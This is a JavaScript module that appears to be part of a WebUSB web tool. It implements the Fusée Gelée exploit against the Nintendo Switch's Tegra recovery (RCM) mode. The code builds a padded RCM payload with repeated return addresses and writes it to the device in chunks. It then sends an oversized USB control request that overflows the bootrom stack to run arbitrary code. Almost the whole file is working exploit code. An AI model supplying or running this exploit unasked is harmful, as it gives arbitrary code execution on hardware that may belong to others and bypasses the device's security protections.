import { LOG_INFO } from "../constants/log-message-types";
import { INTERMEZZO } from "../../intermezzo";

const NVIDIA_VENDOR_ID = 0x0955;
const NINTENDO_SWITCH_PRODUCT_ID = 0x7321;
const PACKET_SIZE = 0x1000;
const VULNERABILITY_LENGTH = 0x7000;
const RCM_PAYLOAD_ADDRESS = 0x40010000;
const INTERMEZZO_LOCATION = 0x4001f000;
const MAXIMUM_RCM_COMMAND_LENGTH = 0x30298;

class FuseeGeleeWebUsb {
  static async runExploit({
    device,
    payload,
    logCallback,
    successCallback,
    errorCallback,
    payloadWriteProgressCallback
  }) {
    try {
      payload = new Uint8Array(payload);

      logCallback({ message: "CREATING RCM PAYLOAD", type: LOG_INFO });

      let rcmPayload = FuseeGeleeWebUsb.createRCMPayload(payload);

      logCallback({ message: "WRITING PAYLOAD", type: LOG_INFO });

      const totalLengthToWrite = rcmPayload.length;
      let lengthLeftToWrite = totalLengthToWrite;
      let writeCount = 0;

      while (lengthLeftToWrite) {
        const dataToWrite = Math.min(rcmPayload.length, PACKET_SIZE);
        const chunk = rcmPayload.slice(0, dataToWrite);
        rcmPayload = rcmPayload.slice(dataToWrite);
        await device.transferOut(1, chunk);
        console.log(
          Math.ceil(
            ((totalLengthToWrite - lengthLeftToWrite) / totalLengthToWrite) *
              100
          )
        );
        payloadWriteProgressCallback(
          Math.ceil(
            ((totalLengthToWrite - lengthLeftToWrite) / totalLengthToWrite) *
              100
          )
        );
        lengthLeftToWrite -= dataToWrite;
        writeCount++;
      }

      payloadWriteProgressCallback(100);

      if (writeCount % 2 !== 1) {
        logCallback({ message: "SWITCHING TO HIGHER BUFFER", type: LOG_INFO });
        await device.transferOut(1, new ArrayBuffer(0x1000));
      }

      logCallback({ message: "SMASHING THE STACK", type: LOG_INFO });
      device.controlTransferIn(
        {
          requestType: "standard",
          recipient: "interface",
          request: 0x00,
          value: 0x00,
          index: 0x00
        },
        VULNERABILITY_LENGTH
      );
      successCallback();
    } catch (error) {
      errorCallback(error);
    }
  }

  static createRCMPayload(payload) {
    const intermezzoAddressRepeatCount =
      (INTERMEZZO_LOCATION - RCM_PAYLOAD_ADDRESS) / 4;

    const rcmPayloadSize =
      Math.ceil(
        (0x2a8 +
          0x4 * intermezzoAddressRepeatCount +
          0x1000 +
          payload.byteLength) /
          0x1000
      ) * 0x1000;

    const rcmPayload = new Uint8Array(new ArrayBuffer(rcmPayloadSize));

    const rcmPayloadView = new DataView(rcmPayload.buffer);
    rcmPayloadView.setUint32(0x0, MAXIMUM_RCM_COMMAND_LENGTH, true);

    for (let i = 0; i < intermezzoAddressRepeatCount; i++) {
      rcmPayloadView.setUint32(0x2a8 + i * 4, INTERMEZZO_LOCATION, true);
    }

    rcmPayload.set(INTERMEZZO, 0x2a8 + 0x4 * intermezzoAddressRepeatCount);
    rcmPayload.set(
      payload,
      0x2a8 + 0x4 * intermezzoAddressRepeatCount + 0x1000
    );

    return rcmPayload;
  }

  static async getDeviceId(device) {
    return new Promise(async (res, rej) => {
      if (!device.opened) {
        await device.open();
        await device.claimInterface(0);
      }

      let obtainedInTime = false;

      setTimeout(() => {
        if (!obtainedInTime) {
          rej("TIMED OUT OBTAINING DEVICE ID. TRY REBOOTING SWITCH.");
        }
      }, 5000);

      const deviceIdArrayBuffer = await device.transferIn(1, 16);
      obtainedInTime = true;
      res(FuseeGeleeWebUsb._bufferToHex(deviceIdArrayBuffer.data.buffer));
    });
  }

  static onDeviceDisconnected(callback) {
    navigator.usb.addEventListener("disconnect", ({ device }) => {
      callback(device);
    });
  }

  static async requestDeviceAccess() {
    return await navigator.usb.requestDevice({
      filters: [
        { vendorId: NVIDIA_VENDOR_ID, productId: NINTENDO_SWITCH_PRODUCT_ID }
      ]
    });
  }

  static _bufferToHex(arrayBuffer) {
    return Array.from(new Uint8Array(arrayBuffer))
      .map(b => b.toString(16).padStart(2, "0"))
      .join("");
  }

  static isSupportedByBrowser() {
    const { detect } = require("detect-browser");
    const browser = detect();

    return (
      navigator.usb !== undefined &&
      browser &&
      browser.name === "chrome" &&
      !browser.os.toLowerCase().includes("windows")
    );
  }
}

export default FuseeGeleeWebUsb;
